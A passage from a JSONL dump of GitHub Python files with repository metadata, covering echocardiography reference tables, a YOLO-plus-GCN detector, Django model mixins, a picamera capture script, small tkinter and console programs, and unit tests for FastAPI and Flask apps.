'sd': 0.83}\naov = {'name': 'aov', 'exp': 0.50, 'mean': 1.48, 'sd': 0.14}\nsov = {'name': 'sov', 'exp': 0.50, 'mean': 2.06, 'sd': 0.18}\nstj = {'name': 'stj', 'exp': 0.50, 'mean': 1.69, 'sd': 0.16}\naao = {'name': 'aao', 'exp': 0.50, 'mean': 1.79, 'sd': 0.18}\nprox_arch = {'name': 'prox_arch', 'exp': 0.50, 'mean': 1.53, 'sd': 0.23}\ndist_arch = {'name': 'dist_arch', 'exp': 0.50, 'mean': 1.36, 'sd': 0.19}\nisthmus = {'name': 'isthmus', 'exp': 0.50, 'mean': 1.25, 'sd': 0.18}\nlmca = {'name': 'lmca', 'exp': 0.45, 'mean': 2.95, 'sd': 0.57}\nlad = {'name': 'lad', 'exp': 0.45, 'mean': 1.90, 'sd': 0.34}\nprox_rca = {'name': 'prox_rca', 'exp': 0.45, 'mean': 2.32, 'sd': 0.55}\npv = {'name': 'pv', 'exp': 0.50, 'mean': 1.91, 'sd': 0.24}\npv_plax = {'name': 'pv_plax', 'exp': 0.50, 'mean': 2.01, 'sd': 0.28}\nmpa = {'name': 'mpa', 'exp': 0.50, 'mean': 1.82, 'sd': 0.24}\nrpa = {'name': 'rpa', 'exp': 0.50, 'mean': 1.07, 'sd': 0.18}\nlpa = {'name': 'lpa', 'exp': 0.50, 'mean': 1.10, 'sd': 0.18}\nlvedd_psax = {'name': 'lvedd_psax', 'exp': 0.45, 'mean': 3.89, 'sd': 0.33}\nlvpwd_psax = {'name': 'lvpwd_psax', 'exp': 0.40, 'mean': 0.57, 'sd': 0.09}\nivsd_psax = {'name': 'ivsd_psax', 'exp': 0.40, 'mean': 0.58, 'sd': 0.09}\nlv_maj_ed_a4c = {'name': 'lv_maj_ed_a4c', 'exp': 0.45, 'mean': 6.31, 'sd': 0.46}\nlv_maj_epi_ed_a4c = {'name': 'lv_maj_epi_ed_a4c', 'exp': 0.45, 'mean': 6.87, 'sd': 0.45}\nlv_eda_psax = {'name': 'lv_eda_psax', 'exp': 0.90, 'mean': 11.91, 'sd': 1.89}\nlv_eda_epi_psax = {'name': 'lv_eda_epi_psax', 'exp': 0.90, 'mean': 20.00, 'sd': 2.59}\nlvedv = {'name': 'lvedv', 'exp': 1.3, 'mean': 62.02, 'sd': 11.94}\nlvedv_epi = {'name': 'lvedv_epi', 'exp': 1.3, 'mean': 113.14, 'sd': 17.85}\nlvm_2d = {'name': 'lvm_2d', 'exp': 1.25, 'mean': 53.02, 'sd': 9.06}\nlv_mass_vol_ratio = {'name': 'lv_mass_vol_ratio', 'exp': 0, 'mean': 0.88, 'sd': 0.16}\nlvpw_lvedd_ratio = {'name': 'lvpw_lvedd_ratio', 'exp': 0, 'mean': 0.15, 'sd': 0.03}\nlv_sphere_idx = {'name': 'lv_sphere_idx', 'exp': 0, 'mean': 1.63, 'sd': 0.17}\n\nsites = [\n 'mvd_ap',\n 'mvd_l',\n 'mv_area',\n 'tvd_ap',\n 'tvd_l',\n 'tv_area',\n 'aov',\n 'sov',\n 'stj',\n 'aao',\n 'prox_arch',\n 'dist_arch',\n 'isthmus',\n 'lmca',\n 'lad',\n 'prox_rca',\n 'pv',\n 'pv_plax',\n 'mpa',\n 'rpa',\n 'lpa',\n 'ivsd_psax',\n 'lvedd_psax',\n 'lvpwd_psax',\n 'lv_maj_ed_a4c',\n 'lv_maj_epi_ed_a4c',\n 'lv_eda_psax',\n 'lv_eda_epi_psax',\n 'lvedv',\n 'lvedv_epi',\n 'lvm_2d',\n 'lv_mass_vol_ratio',\n 'lvpw_lvedd_ratio',\n 'lv_sphere_idx'\n]\n","repo_name":"parameterz/parameterz-main","sub_path":"calcs/echo/lopez_circimaging_2017.py","file_name":"lopez_circimaging_2017.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40883256318","text":"# algorithms for benchmarking node performance\n\nfrom sklearn.metrics import f1_score\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef evaluate_oracle_F1(probs, Y_real):\n\n y_test = [[] for _ in range(Y_real.shape[0])]\n cy = sp.csr_matrix(Y_real).tocoo()\n for i, b in zip(cy.row, cy.col):\n y_test[i].append(b)\n top_k_list = [len(l) for l in y_test]\n assert Y_real.shape[0] == len(top_k_list)\n predictions = []\n for i, k in enumerate(top_k_list):\n probs_ = probs[i, :]\n a = np.zeros(probs.shape[1])\n labels_tmp = probs_.argsort()[-k:]\n a[labels_tmp] = 1\n predictions.append(a)\n predictions = np.matrix(predictions)\n\n micro = f1_score(Y_real, predictions, average='micro')\n macro = f1_score(Y_real, predictions, average='macro')\n return (micro, macro)\n","repo_name":"SkBlaz/py3plex","sub_path":"py3plex/algorithms/general/benchmark_classification.py","file_name":"benchmark_classification.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"60"} +{"seq_id":"69887579711","text":"from import_data import import_data\nfrom export_data import export_data\nfrom print_data import print_data\nfrom print_name import print_name\n\n\ndef greeting():\n print(\"Телефонный справочник!\")\n\n\ndef input_data():\n id = input(\"Введите ID контакта: \")\n first_name = input(\"Введите имя: \")\n last_name = input(\"Введите фамилию: \")\n phone_number = input(\"Введите номер телефона: \")\n comment = input(\"Введите комментарий: \")\n\n return [id, first_name, last_name, phone_number, comment]\n\n\ndef choice_sep():\n sep = input(\"Введите разделитель ' ' или ',': \")\n if sep != \" \" and sep != \",\":\n sep = choice_sep()\n return sep\n\n\ndef choice_todo():\n print(\"Доступные операции с телефонной книгой:\\n\\\n 1 - Импорт;\\n\\\n 2 - Экспорт;\\n\\\n 3 - Имя, Фамилия.\")\n ch = input(\"Введите цифру: \")\n if ch == '1':\n sep = choice_sep()\n import_data(input_data(), sep)\n elif ch == '2':\n data = export_data()\n print_data(data)\n elif ch == '3':\n data = export_data()\n print_name(data)\n","repo_name":"MizenkoEugen/Homework_py","sub_path":"Seminar_7/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37301048039","text":"from tkinter import *\nfrom PIL import ImageTk,Image\n\nroot = Tk()\nroot.title(\"Frame gui\")\nroot.geometry('300x300')\n\nframe=LabelFrame(root,text=\"Welcome!\",bg=\"yellow\",padx=20,pady=30)\nframe.pack(padx=10, pady=10)\n\nbtn=Button(frame,text=\"this is a button\",bg=\"crimson\")\nbtn.grid(row=0,column=0,padx=5,pady=5)\n\nbtn1=Button(frame,text=\"this is a button1\",bg=\"red\")\nbtn1.grid(row=1,column=0,padx=5,pady=5)\n\n\n\nroot.mainloop()","repo_name":"nahidhasan007/Python-","sub_path":"status bar.py","file_name":"status bar.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14244304743","text":"import typing\nimport uuid\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.db.models import fields\nfrom django.urls import reverse\n\nimport utils\n\n\nclass IDField(fields.UUIDField, fields.DateTimeCheckMixin):\n \"\"\"\n A cross of UUIDField and DateTimeField meant to use as a pk.\n\n Can be auto_now/auto_now_add like DateTimeField, uses UUID\n format like UUIDField and uses a sortable generator for DB efficiency.\n \"\"\"\n def __init__(\n self, verbose_name: typing.Union[str, None] = None,\n auto_now: bool = False, auto_now_add: bool = False,\n node: int = 0, namespace: int = 0, extra: int = 0,\n **kwargs: typing.Any,\n ):\n self.auto_now, self.auto_now_add = auto_now, auto_now_add\n self.node = node\n self.namespace = namespace\n self.extra = extra\n if auto_now or auto_now_add:\n kwargs['editable'] = False\n kwargs['blank'] = True\n super().__init__(verbose_name, **kwargs)\n\n def pre_save(self, model_instance: models.Model, add: bool) -> uuid.UUID:\n if self.auto_now or (self.auto_now_add and add):\n value = utils.seq_uuid(\n node=self.node or getattr(settings, 'NODE_ID', 0),\n namespace=self.namespace or getattr(self.model, 'namespace_id', 0),\n extra=self.extra,\n )\n setattr(model_instance, self.attname, value)\n return value\n return super().pre_save(model_instance, add)\n\n\nclass IDModel(models.Model):\n # ID namespace, preferably should be different for every model (1 unsigned byte).\n namespace_id = 0 # maybe xor model name or something by default?\n # (Not foolproof but still more variation than default zero everywhere)\n lookup_field = 'uid' # Not DRY but easier than checking routers every time\n pk_url_kwarg = 'uid' # Attempt to mimic django class-based views, unfinished\n default_url_namespace = 'api1'\n uid = IDField(\n auto_now_add=True,\n primary_key=True,\n )\n mid = IDField(\n auto_now=True,\n db_index=True,\n )\n is_active = models.BooleanField(\n default=True,\n help_text='Soft-delete',\n )\n\n class Meta:\n abstract = True\n\n def __str__(self) -> str:\n key = getattr(self, self.lookup_field)\n return f'{self._meta.model_name}: {key}'\n\n def get_url(self, namespace: str = '') -> str:\n \"\"\"\n Kinda like the usual get_absolute_url but better.\n\n Get some values from the model class so we don't have to\n override this for every single new model.\n I like a shorter method name for this and optional argument\n provides forward compatibility with other api versions.\n \"\"\"\n if not namespace:\n namespace = self.default_url_namespace\n try:\n if namespace:\n # E.g. if namespace=api1 and pattern_name_api1=viewname return api1:viewname\n pattern_name = ':'.join([\n namespace,\n getattr(self, f'pattern_name_{namespace}'),\n ])\n else:\n # Not namespaced version, just in case (I like namespaces)\n pattern_name = self.pattern_name\n except AttributeError as exc:\n raise ImproperlyConfigured(exc)\n key = getattr(self, self.lookup_field)\n return reverse(pattern_name, kwargs={self.lookup_field: key})\n\n def get_absolute_url(self) -> str:\n \"\"\"\n For compatibility with 3rd-party tools.\n \"\"\"\n return self.get_url()\n\n\nclass SlugMixin(models.Model):\n \"\"\"\n Popular additions to many models but not all.\n \"\"\"\n lookup_field = 'slug'\n slug_field = 'slug'\n slug_url_kwarg = 'slug'\n name = models.CharField(\n max_length=128,\n )\n slug = models.SlugField(\n max_length=128,\n unique=True,\n )\n\n class Meta:\n abstract = True\n","repo_name":"IvanAnishchuk/pizzeria_dangelo","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2032366489","text":"import torch\nimport torch.nn as nn\n\nfrom nets.ConvNext import ConvNeXt_Small, ConvNeXt_Tiny\nfrom nets.CSPdarknet import C3, Conv, CSPDarknet\nfrom nets.Swin_transformer import Swin_transformer_Tiny\nfrom pygcn.models import GCN\n\nimport numpy as np\n\n# SE\n# class SELayer(nn.Module):\n# def __init__(self, channel, reduction=16):\n# super(SELayer, self).__init__()\n# self.avg_pool = nn.AdaptiveAvgPool2d(1)\n# self.fc = nn.Sequential(\n# nn.Linear(channel, channel // reduction, bias=False),\n# nn.ReLU(inplace=True),\n# nn.Linear(channel // reduction, channel, bias=False),\n# nn.Sigmoid()\n# )\n#\n# def forward(self, x):\n# b, c, _, _ = x.size()\n# y = self.avg_pool(x).view(b, c)\n# y = self.fc(y).view(b, c, 1, 1)\n# return x * y.expand_as(x)\n\n\n#---------------------------------------------------#\n# yolo_body\n#---------------------------------------------------#\nclass YoloBody(nn.Module):\n def __init__(self, anchors_mask, num_classes, phi, adj, backbone='cspdarknet', pretrained=False, input_shape=[640, 640]):\n super(YoloBody, self).__init__()\n depth_dict = {'s' : 0.33, 'm' : 0.67, 'l' : 1.00, 'x' : 1.33,}\n width_dict = {'s' : 0.50, 'm' : 0.75, 'l' : 1.00, 'x' : 1.25,}\n dep_mul, wid_mul = depth_dict[phi], width_dict[phi]\n\n base_channels = int(wid_mul * 64) # 64\n base_depth = max(round(dep_mul * 3), 1) # 3\n #-----------------------------------------------#\n # 输入图片是640, 640, 3\n # 初始的基本通道是64\n #-----------------------------------------------#\n self.backbone_name = backbone\n self.num_classes = num_classes\n self.adj = adj\n\n if backbone == \"cspdarknet\":\n #---------------------------------------------------# \n # 生成CSPdarknet53的主干模型\n # 获得三个有效特征层,他们的shape分别是:\n # 80,80,256\n # 40,40,512\n # 20,20,1024\n #---------------------------------------------------#\n self.backbone = CSPDarknet(base_channels, base_depth, phi, pretrained)\n else:\n #---------------------------------------------------# \n # 如果输入不为cspdarknet,则调整通道数\n # 使其符合YoloV5的格式\n #---------------------------------------------------#\n self.backbone = {\n 'convnext_tiny' : ConvNeXt_Tiny,\n 'convnext_small' : ConvNeXt_Small,\n 'swin_transfomer_tiny' : Swin_transformer_Tiny,\n }[backbone](pretrained=pretrained, input_shape=input_shape)\n in_channels = {\n 'convnext_tiny' : [192, 384, 768],\n 'convnext_small' : [192, 384, 768],\n 'swin_transfomer_tiny' : [192, 384, 768],\n }[backbone]\n feat1_c, feat2_c, feat3_c = in_channels \n self.conv_1x1_feat1 = Conv(feat1_c, base_channels * 4, 1, 1)\n self.conv_1x1_feat2 = Conv(feat2_c, base_channels * 8, 1, 1)\n self.conv_1x1_feat3 = Conv(feat3_c, base_channels * 16, 1, 1)\n \n self.upsample = nn.Upsample(scale_factor=2, mode=\"nearest\")\n\n self.conv_for_feat3 = Conv(base_channels * 16, base_channels * 8, 1, 1)\n self.conv3_for_upsample1 = C3(base_channels * 16, base_channels * 8, base_depth, shortcut=False)\n\n self.conv_for_feat2 = Conv(base_channels * 8, base_channels * 4, 1, 1)\n self.conv3_for_upsample2 = C3(base_channels * 8, base_channels * 4, base_depth, shortcut=False)\n\n self.down_sample1 = Conv(base_channels * 4, base_channels * 4, 3, 2)\n self.conv3_for_downsample1 = C3(base_channels * 8, base_channels * 8, base_depth, shortcut=False)\n\n self.down_sample2 = Conv(base_channels * 8, base_channels * 8, 3, 2)\n self.conv3_for_downsample2 = C3(base_channels * 16, base_channels * 16, base_depth, shortcut=False)\n\n # 80, 80, 256 => 80, 80, 3 * (5 + num_classes) => 80, 80, 3 * (4 + 1 + num_classes)\n # self.yolo_head_P3_box = nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * (5 + num_classes), 1)\n self.yolo_head_P3_box = nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * 4, 1)\n self.yolo_head_P3_cls = nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * (1 + num_classes), 1)\n # 40, 40, 512 => 40, 40, 3 * (5 + num_classes) => 40, 40, 3 * (4 + 1 + num_classes)\n #self.yolo_head_P4 = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * (5 + num_classes), 1)\n self.yolo_head_P4_box = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * 4, 1)\n self.yolo_head_P4_cls = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * (1 + num_classes), 1)\n # 20, 20, 1024 => 20, 20, 3 * (5 + num_classes) => 20, 20, 3 * (4 + 1 + num_classes)\n #self.yolo_head_P5 = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * (5 + num_classes), 1)\n self.yolo_head_P5_box = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * 4, 1)\n self.yolo_head_P5_cls = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * (1 + num_classes), 1)\n\n self.GCN = GCN(nfeat=1,\n nhid=16,\n nclass=1,\n dropout=0.5)\n\n # self.maxpool2 = nn.MaxPool2d(52)\n # self.maxpool1 = nn.MaxPool2d(26)\n # self.maxpool0 = nn.MaxPool2d(13)\n #\n # self.maxpool3 = nn.MaxPool1d(9)\n\n\n def forward(self, x):\n # backbone\n feat1, feat2, feat3 = self.backbone(x)\n if self.backbone_name != \"cspdarknet\":\n feat1 = self.conv_1x1_feat1(feat1)\n feat2 = self.conv_1x1_feat2(feat2)\n feat3 = self.conv_1x1_feat3(feat3)\n\n # 20, 20, 1024 -> 20, 20, 512\n P5 = self.conv_for_feat3(feat3)\n # 20, 20, 512 -> 40, 40, 512\n P5_upsample = self.upsample(P5)\n # 40, 40, 512 -> 40, 40, 1024\n P4 = torch.cat([P5_upsample, feat2], 1)\n\n # 40, 40, 1024 -> 40, 40, 512\n P4 = self.conv3_for_upsample1(P4)\n\n # 40, 40, 512 -> 40, 40, 256\n P4 = self.conv_for_feat2(P4)\n # 40, 40, 256 -> 80, 80, 256\n P4_upsample = self.upsample(P4)\n # 80, 80, 256 cat 80, 80, 256 -> 80, 80, 512\n P3 = torch.cat([P4_upsample, feat1], 1)\n\n # 80, 80, 512 -> 80, 80, 256\n P3 = self.conv3_for_upsample2(P3)\n \n # 80, 80, 256 -> 40, 40, 256\n P3_downsample = self.down_sample1(P3)\n # 40, 40, 256 cat 40, 40, 256 -> 40, 40, 512\n P4 = torch.cat([P3_downsample, P4], 1)\n\n # 40, 40, 512 -> 40, 40, 512\n P4 = self.conv3_for_downsample1(P4)\n\n # 40, 40, 512 -> 20, 20, 512\n P4_downsample = self.down_sample2(P4)\n # 20, 20, 512 cat 20, 20, 512 -> 20, 20, 1024\n P5 = torch.cat([P4_downsample, P5], 1)\n\n # 20, 20, 1024 -> 20, 20, 1024\n P5 = self.conv3_for_downsample2(P5)\n\n #---------------------------------------------------#\n # 第三个特征层\n # y3=(batch_size,75,80,80)\n #---------------------------------------------------#\n #out2 = self.yolo_head_P3(P3)\n\n out2_box = self.yolo_head_P3_box(P3)\n out2_cls = self.yolo_head_P3_cls(P3)\n bs = out2_cls.size(0)\n #print(\"2:\", out2_box.shape)\n #print(\"2:\", out2_cls.shape)\n # 拼接后计算损失\n t2_box = out2_box.view(bs, 3, 4, 52 * 52)\n t2_cls = out2_cls.view(bs, 3, (1 + self.num_classes), 52 * 52)\n out2 = torch.cat([t2_box, t2_cls], dim=2)\n out2 = out2.view([bs, -1, 52, 52])\n\n\n #---------------------------------------------------#\n # 第二个特征层\n # y2=(batch_size,75,40,40)\n #---------------------------------------------------#\n # out1 = self.yolo_head_P4(P4)\n out1_box = self.yolo_head_P4_box(P4)\n out1_cls = self.yolo_head_P4_cls(P4)\n # 拼接后计算损失\n t1_box = out1_box.view(bs, 3, 4, 26 * 26)\n t1_cls = out1_cls.view(bs, 3, (1 + self.num_classes), 26 * 26)\n out1 = torch.cat([t1_box, t1_cls], dim=2)\n out1 = out1.view([bs, -1, 26, 26])\n\n\n #---------------------------------------------------#\n # 第一个特征层\n # y1=(batch_size,75,20,20)\n #---------------------------------------------------#\n # out0 = self.yolo_head_P5(P5)\n\n out0_box = self.yolo_head_P5_box(P5)\n out0_cls = self.yolo_head_P5_cls(P5)\n # 拼接后计算损失\n t0_box = out0_box.view(bs, 3, 4, 13 * 13)\n t0_cls = out0_cls.view(bs, 3, (1 + self.num_classes), 13 * 13)\n out0 = torch.cat([t0_box, t0_cls], dim=2)\n out0 = out0.view([bs, -1, 13, 13])\n\n\n\n\n # 以下语义关联模块\n\n # 一、原始概率矩阵\n\n # -----------------------------------------------#\n # 原始类别头输出一共三个,他们的shape分别是\n # bs, 3 * (1+num_classes), 52, 52 => bs, 3, 1 + num_classes, 52, 52 => batch_size, 3, 52, 52, 1 + num_classes\n\n # batch_size, 3, 13, 13, 1 + num_classes\n # batch_size, 3, 26, 26, 1 + num_classes\n # batch_size, 3, 52, 52, 1 + num_classes\n tensor2_org = out2_cls.view(bs, 3, (1 + self.num_classes), 52, 52).permute(0, 1, 3, 4, 2).contiguous()\n tensor1_org = out1_cls.view(bs, 3, (1 + self.num_classes), 26, 26).permute(0, 1, 3, 4, 2).contiguous()\n tensor0_org = out0_cls.view(bs, 3, (1 + self.num_classes), 13, 13).permute(0, 1, 3, 4, 2).contiguous()\n\n # 取(1 + self.num_classes)中类别概率并排为矩阵形式\n matrix2_org = tensor2_org.view(-1, 3 * 52 * 52, (1 + self.num_classes))\n matrix1_org = tensor1_org.view(-1, 3 * 26 * 26, (1 + self.num_classes))\n matrix0_org = tensor0_org.view(-1, 3 * 13 * 13, (1 + self.num_classes))\n\n # 原始置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n GCN_input_org = torch.cat([matrix2_org, matrix1_org, matrix0_org], dim=1)\n Matrix_org = torch.sigmoid(GCN_input_org)\n\n # 置信系数{0,1} [bs, num_anchors, 1]\n matrix_conf_org = Matrix_org[..., 0].unsqueeze(dim=2)\n matrix_conf = torch.where(matrix_conf_org > 0.5, 1, 0)\n\n # 置信系数{0,1}取舍后的概率矩阵[bs, num_anchors, num_classes]\n matrix_cls_org = Matrix_org[..., 1:]\n matrix_cls = torch.mul(matrix_conf, matrix_cls_org).detach()\n\n # 取每个类别的最大概率值为GCN_input\n GCN_input = torch.max(matrix_cls, dim=1)[0].unsqueeze(dim=2).detach()\n # GCN_input_ = torch.where(GCN_input > 0.3, 1.0, 0.0)\n # GCN_input_ = torch.cat([GCN_input, GCN_input_], dim=2)\n #print(\"1\", GCN_input_)\n\n\n # meta_target = [[1.0], [3.0], [1.0], [1.0], [1.0], [3.0], [1.0], [3.0]]\n # meta_target = np.array(meta_target)\n # meta_target = torch.from_numpy(meta_target)\n # meta_target = meta_target.cuda()\n # meta_target = meta_target.to(torch.float32)\n\n # meta_target = meta_target - GCN_input_\n\n # GCN处理\n # 邻接矩阵,转换为tensor后需指定为torch.float32\n\n # print(GCN_input.shape[2])\n # nfeat取结点特征维度, nhid为中间层维度, nclass为输出维度\n # model = GCN(nfeat=GCN_input.shape[2],\n # nhid=16,\n # nclass=self.num_classes,\n # dropout=0.5)\n\n output = self.GCN(GCN_input, self.adj)\n # print(output)\n # print(\"2\", meta)\n meta_list = []\n meta_list.append(GCN_input)\n meta_list.append(output)\n\n\n # # 对角矩阵化\n # output = output.squeeze(axis=2)\n # output = torch.diag_embed(output)\n # #print(output)\n #\n # # 调整后的置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n # matrix_cls_fixed = torch.bmm(Matrix_org[..., 1:], output)\n # Matrix_fixed = torch.cat([matrix_conf_org, matrix_cls_fixed], dim=2)\n # # print(matrix_conf_org == Matrix_fixed[..., 0].unsqueeze(dim=2))\n\n # 加法调整\n # 调整后的置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n matrix_cls_fixed = torch.sigmoid(GCN_input_org[..., 1:] + output.permute(0, 2, 1))\n Matrix_fixed = torch.cat([matrix_conf_org, matrix_cls_fixed], dim=2)\n # print(matrix_conf_org == Matrix_fixed[..., 0].unsqueeze(dim=2))\n\n\n tensor_ = Matrix_fixed.permute(0, 2, 1)\n tensor2 = tensor_[:, :, 0:8112].permute(0, 2, 1)\n tensor1 = tensor_[:, :, 8112:(8112 + 2028)].permute(0, 2, 1)\n tensor0 = tensor_[:, :, (8112 + 2028):10647].permute(0, 2, 1)\n\n\n # 经过图卷积调整后的分类头\n cls2_ = tensor2.view(bs, 3, 52, 52, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n cls1_ = tensor1.view(bs, 3, 26, 26, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n cls0_ = tensor0.view(bs, 3, 13, 13, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n\n\n t2_cls_ = cls2_.view(bs, 3, (1 + self.num_classes), 52 * 52)\n out2_fix = torch.cat([t2_box, t2_cls_], dim=2)\n out2_fix = out2_fix.view([bs, -1, 52, 52])\n\n t1_cls_ = cls1_.view(bs, 3, (1 + self.num_classes), 26 * 26)\n out1_fix = torch.cat([t1_box, t1_cls_], dim=2)\n out1_fix = out1_fix.view([bs, -1, 26, 26])\n\n t0_cls_ = cls0_.view(bs, 3, (1 + self.num_classes), 13 * 13)\n out0_fix = torch.cat([t0_box, t0_cls_], dim=2)\n out0_fix = out0_fix.view([bs, -1, 13, 13])\n\n # return out0, out1, out2\n return out0, out1, out2, out0_fix, out1_fix, out2_fix, meta_list\n # return out0, out1, out2, out0, out1, out2, meta\n\nif __name__ == '__main__':\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n input = torch.rand([8, 3, 416, 416]).to(device)\n\n # 邻接矩阵,转换为tensor后需指定为torch.float32\n adj = [\n [1, 1, 1],\n [1, 1, 1],\n [1, 1, 1],\n ]\n # torch.float32\n adj = torch.tensor(adj, dtype=torch.float).to(device)\n\n anchors_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]]\n num_classes = 3\n phi = 's'\n model = YoloBody(anchors_mask, num_classes, phi, adj, input_shape=[416, 416])\n model.to(device)\n out0, out1, out2, out0_fix, out1_fix, out2_fix, meta = model(input)\n # print(out0.shape)\n # print(out1.shape)\n # print(out2.shape)\n # print(out0_fix.shape)\n # print(out1_fix.shape)\n # print(out2_fix.shape)\n\n #print('meta:', meta[0])\n print('meta_:', meta[1])\n # outputs = model(input)[-3:]\n # print(outputs[0].shape)\n # print(outputs[1].shape)\n # print(outputs[2].shape)\n loss_ = torch.nn.MSELoss()\n\n print(loss_(meta[0], meta[1]))","repo_name":"qiuqianpu/Odkd","sub_path":"nets/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":15024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1789150070","text":"# Написать программу решения задачи: найти длины биссектрис треугольника, заданного координатами своих вершин A, B, C.\n\nfrom math import sqrt\n \ndef fun(x, y, z) :\n d = y + z\n return sqrt(y * z * (d + x) * (d - x)) / d\n \na = float(input('введите a: '))\nb = float(input('введите b: '))\nc = float(input('введите c: '))\n\nprint('Биссектриса к \"a\" = {:f}'.format(fun(a, b, c)))\nprint('Биссектриса к \"b\" = {:f}'.format(fun(b, c, a)))\nprint('Биссектриса к \"с\"= {:f}'.format(fun(c, a, b)))","repo_name":"v1nchiko/Python2","sub_path":"lab_2/lab_2_9.py","file_name":"lab_2_9.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39651812044","text":"from app.tests.test_database import client\n\n\ndef test_save():\n response = client.post(\"/api/v1/save-statistics\", params={\n \"stat_date\": \"2022-10-20\",\n \"views\": 0,\n \"clicks\": 0,\n \"cost\": 0\n })\n assert response.status_code == 200, response.text\n data = response.json()\n assert data['data']['stat_date'] == \"2022-10-20\"\n assert data['data']['views'] == 0\n assert data['data']['clicks'] == 0\n assert data['data']['cost'] == 0\n\n\ndef test_get():\n save_stat = client.post(\"/api/v1/save-statistics\", params={\n \"stat_date\": \"2022-10-20\",\n \"views\": 0,\n \"clicks\": 0,\n \"cost\": 0\n })\n\n response = client.get(\"/api/v1/get-statistics\", params={'start': \"2022-10-20\", 'end': '2022-10-20'})\n assert response.status_code == 200, response.text\n data = response.json()\n for statistic in data['data']:\n assert statistic['stat_date'] == \"2022-10-20\"\n assert statistic['views'] == 0\n assert statistic['clicks'] == 0\n assert statistic['cost'] == 0\n\n\n","repo_name":"Shift321/Statistics","sub_path":"app/tests/test_crud/test_statistics.py","file_name":"test_statistics.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35662372577","text":"import picamera\nimport picamera.array\nimport time\nimport numpy as np\nimport cv2\nimport io\nimport datetime\nfrom time import sleep\nfrom datetime import datetime, timedelta\n\ndef PreviewOpencvJpeg(camera):\n with io.BytesIO() as stream:\n for frame in camera.capture_continuous(stream, format='jpeg', splitter_port = 2, resize = (320,240), use_video_port=True):\n data = np.fromstring(frame.getvalue(),dtype=np.unit8)\n d1 = datetime.datetime.now()\n cv_image = cv2.imdecode(data,1)\n d = datetime.datetime.now() - d1\n print (\"consuming %dms\" % (d.microseconds/1000))\n print (cv_image.shape)\n cv2.imwrite(\"{timestamp:%Y-%m-%d-%H-%M-%S}.png\", cv_image)\n stream.seek(0)\n stream.trncate(0)\n \n\nwith picamera.PiCamera() as camera:\n camera.preview_fullscreen = False\n camera.preview_window = (5,-20,600,500)\n #camera.resolution = (1024,768)\n camera.resolution = (1920,1680)\n camera.framerate = (25)\n camera.start_preview()\n camera.annotate_text = \"experiment\"\n camera.vflip = True\n camera.hflip = True\n time.sleep(1)\n for filename in camera.capture_continuous('image{timestamp:%Y-%m-%d-%H-%M-%S}.jpeg'):\n print('Captured %s' % filename)\n time.sleep(120)\n print (\"start preview direct from GPU\")\n# camera.start_preview()\n PreviewOpencvJpeg(camera)\n \n","repo_name":"kirinhcl/phenotyping-platform","sub_path":"RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7499032905","text":"from datetime import datetime\nfrom mock import Mock\n\nfrom flask_testing import TestCase\n\nfrom onepage.utils import auth\nfrom onepage.models import Novel\nfrom onepage.models import User\nimport onepage\n\n\nclass TestNovel(TestCase):\n def create_app(self):\n app = onepage.app\n app.config['TESTING'] = True\n return app\n\n def _create_mock_novel(self):\n mock_novel = Novel()\n mock_novel.id = 1\n mock_novel.user = User()\n mock_novel.created_at = datetime.now()\n mock_novel.updated_at = datetime.now()\n return mock_novel\n\n def test_get_novel_list(self):\n Novel.page_count = Mock(return_value=1)\n Novel.pagenation = Mock(return_value=[self._create_mock_novel()])\n self.client.get('/novel/list')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_no_page_count(self):\n Novel.page_count = Mock(return_value=0)\n Novel.pagenation = Mock(return_value=[])\n self.client.get('/novel/list')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_specified_page(self):\n Novel.page_count = Mock(return_value=1)\n Novel.pagenation = Mock(return_value=[self._create_mock_novel()])\n self.client.get('/novel/list/1')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_not_found_page(self):\n self.assert404(self.client.get('/novel/list/-1'))\n self.assert404(self.client.get('/novel/list/0'))\n\n def test_get_novel_detail(self):\n Novel.find = Mock(return_value=self._create_mock_novel())\n 